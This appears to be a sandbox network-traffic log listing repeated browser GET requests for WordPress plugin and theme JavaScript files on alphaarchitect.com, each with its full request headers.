Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-account.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/ultimate-member/assets/libs/fileupload/fileupload.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-functions.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-responsive.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-conditional.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/mailchimp-for-wp/assets/js/forms.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/select2/select2.full.min.js?ver=4.0.13 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/mc4wp-premium/ajax-forms/assets/js/ajax-forms.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/awb-tabs-widget.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/awb-vertical-menu-widget.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/ultimate-member/assets/libs/select2/i18n/en.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/cssua.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/raty/um-raty.min.js?ver=2.6.0 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-scripts.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-profile.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-account.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/swiper.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/mailchimp-for-wp/assets/js/forms.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.transition.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.tooltip.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-parallax.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/mc4wp-premium/ajax-forms/assets/js/ajax-forms.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-video-general.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-video-bg.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/awb-tabs-widget.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/awb-vertical-menu-widget.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/cssua.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.transition.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-lightbox.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-youtube.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
